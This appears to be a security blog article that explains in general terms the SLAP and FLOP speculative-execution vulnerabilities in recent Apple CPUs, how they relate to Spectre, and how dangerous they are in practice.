SLAP and FLOP: Complex vulnerabilities in Apple CPUs

Researchers from universities in Germany and the U.S. recently showcased an interesting attack — or rather, two attacks — exploiting two different vulnerabilities in Apple CPUs. Picture this: someone sends you a link in a chat. When you click it, nothing looks suspicious at first. It doesn’t ask for your work email password, doesn’t try to get you to download a sketchy file. The page might even contain something fun or useful. But while you’re busy browsing it, hidden code is secretly harvesting data from another browser tab  — checking your location, recent online purchases, and even stealing your emails.

The description of the attack seems simple enough, but in reality, we’re talking about a very complex attack that exploits the features of so-called speculative execution by the CPU.

Wait a minute! Haven’t we heard this before?

You just might have. The core idea of the new attacks resembles various Spectre-type attacks that exploit other, albeit somewhat similar, vulnerabilities in Intel and AMD CPUs. We’ve covered those attacks before. In 2022, four years after the first Spectre vulnerability was discovered, we concluded that there was no realistic, easy, or effective way to exploit those vulnerabilities. Although exploiting these new Apple chip vulnerabilities isn’t straightforward either, the difference this time is that the researchers have already provided fairly realistic attack scenarios and proved their feasibility. To see just how dangerous these vulnerabilities are, let’s briefly recap the basic principles behind all such attacks without getting bogged down in complicated research.

Exploiting speculative execution logic

Speculative execution refers to a situation where the processor executes the next instruction without waiting for the previous one to finish. Let’s draw a somewhat odd yet helpful analogy here with a car. Imagine your car starts the engine automatically every time you approach it. If you’re just passing by, the engine stops (as such, the operation is unnecessary). But if you’re about to set off driving, it’s ready to go as soon as you get in.

Similarly, a CPU can decide to run an operation in speculative execution mode. And by the time the previous computation is complete, the program’s logic might have changed, making this operation unnecessary; in this case it’s discarded. CPU designers utilize a variety of techniques to improve branch-predictor capability to forecast instructions that are most likely to be executed next. To accomplish this, they gather instruction execution statistics: if a certain code segment is always invoked under particular conditions, it’s probable that it will be invoked under the same conditions again.

Such a computation may involve rather sensitive operations such as accessing protected memory areas containing secret data. The issue lies in the fact that even if a program shouldn’t have access to such data, it can still potentially “train” the speculative execution algorithm to access it.

Before the Spectre attack was discovered in August 2018, it wasn’t considered to be a data leakage risk. Secret information, such as encryption keys and private user data, is stored in the restricted-access CPU cache. However, the researchers who discovered Spectre found that cached data could be extracted indirectly — by performing hundreds and thousands of read operations and measuring the execution time of these instructions. They found that one could “guess” cached values that way: if the guess is correct, the instruction would execute fractions of a second faster.

So, there are two crucial components to a Spectre-like attack. One is the ability to trick the speculative execution algorithm into accessing a forbidden memory area. The other is the capability to read this data indirectly through a side channel.

SLAP and FLOP attacks on Apple CPUs

The researchers from Germany and the U.S. wrote two separate papers at once — because they’d discovered two different vulnerabilities in Apple CPUs. One issue was found in the Load Address Predictor. This is one of many speculative execution systems that predicts the RAM address that a running program will most likely access. The second vulnerability was found in the Load Value Predictor system. This additionally attempts to anticipate the actual value that will be retrieved from RAM.

The researchers named the two attacks “SLAP” and “FLOP”: short for “Speculative Load Address Prediction” and “False Load Output Prediction”. Although both attacks have a common principle and result in a similar outcome, the methods of exploiting these vulnerabilities differ significantly — hence the two different studies. In the former case, the researchers demonstrated how the Load Address Predictor could be exploited to read restricted data. In the second case, while no data was actually read, the system’s accurate prediction of what would be read could again expose sensitive information.

How dangerous are SLAP and FLOP attacks?

Nearly all Spectre-type attacks are subject to numerous limitations that hinder their practical use for malicious purposes:

• The “malicious code” exploiting a vulnerability in the speculative execution system must be running on the same CPU core as the targeted process.
• The ability to steal data often depends on the presence of code with certain features in the OS kernel or other software that the attacker has no control over.
• Carrying out a remote attack over a network or through a browser is extremely difficult because measuring the instruction execution time to obtain data through a side channel becomes a lot more complicated.

Therefore, all previous attacks could be categorized as very complex, and only applicable for attempts to access highly valuable data, which means the attacker needed considerable resources to develop such an attack. All in all, that’s good news, as patching certain hardware vulnerabilities in production CPUs is either virtually impossible or associated with a substantial decrease in performance.

SLAP and FLOP open up a different perspective. They affect the latest processors made by Apple. The Load Address Predictor was introduced on desktop computers and laptops with the Apple M2 CPU model, and mobile devices with the Apple A15. The more advanced Load Value Predictor first appeared in the Apple M3 and A17, respectively.

Implementing these attacks is still a challenge. However, a key difference in this study compared to previous ones is that it immediately both proposed and verified the feasibility of practical attacks. The researchers demonstrated how SLAP and FLOP can be used to bypass multiple security layers both in the CPU and the Safari browser to gain access to sensitive data.

This alone might not be enough reason for cybercriminals to develop functional malware targeting Apple devices; however, there are other reasons why attempts to use SLAP and FLOP could be made in the wild.

Apple devices are rather well protected. Exploits allowing one to bypass an iPhone’s security system and gain access to the owner’s private data command exorbitant prices on the gray and black markets. Thus, it’s reasonable to assume that a hardware vulnerability that’s highly likely to remain at least partially unfixed will be exploited in targeted attacks when particularly valuable data is sought. It’s therefore not out of the question that we’ll see such vulnerabilities exploited in targeted attacks on Apple devices.